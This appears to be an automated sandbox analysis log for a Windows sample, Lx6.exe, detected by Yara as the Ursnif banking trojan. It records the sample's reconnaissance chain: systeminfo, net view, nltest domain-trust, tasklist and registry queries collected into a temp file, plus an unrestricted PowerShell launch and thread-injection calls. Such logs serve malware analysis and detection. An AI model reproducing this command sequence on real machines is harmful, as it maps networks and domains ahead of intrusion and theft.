Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\more.com more
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"

Source: C:\Users\user\Desktop\Lx6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akfsyqoz.ont.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0076FD17 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

0_2_0076FD17

Source: C:\Windows\System32\control.exe

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2692:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2760:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6012:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2500:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1240:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\{B0580A46-4F94-62F5-59E4-F3B69D58D74A}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1948:120:WilError_01
Source: C:\Users\user\Desktop\Lx6.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D81B4F77-576D-CA2A-A18C-7B9E6580DFB2}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_01
Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D44985C1-232B-2616-4D48-07BAD1FC2B8E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5004:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4384:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Mutant created: \Sessions\1\BaseNamedObjects\{78F747AD-7754-6AA7-C12C-9B3E8520FF52}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{443CA95C-D31A-1662-7DB8-B7AA016CDB7E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4564:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Mutant created: \Sessions\1\BaseNamedObjects\{E47BD961-F315-B6E2-9D58-D74A210CFB1E}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5672:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5300:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{48DADAAC-07B9-BA22-D1FC-2B8E95F08FA2}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1172:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3912:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6CC2E80A-DBDA-7E52-C560-3F92C994E3E6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01

Source: C:\Users\user\Desktop\Lx6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Lx6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdb source: powershell.exe, 00000004.00000002.797557745.0000021F39EFC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbXP"x source: powershell.exe, 00000004.00000002.798921671.0000021F39F62000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Lx6.exe, 00000000.00000003.448194501.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdb source: powershell.exe, 00000004.00000002.798534347.0000021F39F41000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\jxpjpfgv.pdbr\|* source: powershell.exe, 00000004.00000003.449394272.0000021F4DAA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .C:\Users\user\AppData\Local\Temp\iyr5jfx4.pdbXP"x source: powershell.exe, 00000004.00000002.798092069.0000021F39F20000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075B106 push ecx; mov dword ptr [esp], 00000002h	0_2_0075B107
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00772AB3 push ecx; ret	0_2_00772AC3
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00772580 push ecx; ret	0_2_00772589
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00769772 push ss; ret	0_2_00769773
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03042AB3 push ecx; ret	35_2_03042AC3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302B106 push ecx; mov dword ptr [esp], 00000002h	35_2_0302B107
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03039772 push ss; ret	35_2_03039773
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03042580 push ecx; ret	35_2_03042589

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_00401000 LoadLibraryA,GetProcAddress,

0_2_00401000

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\vupj0yhs.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\msihj3zd.dll	Jump to dropped file

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Hooking and other Techniques for Hiding and Protection

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
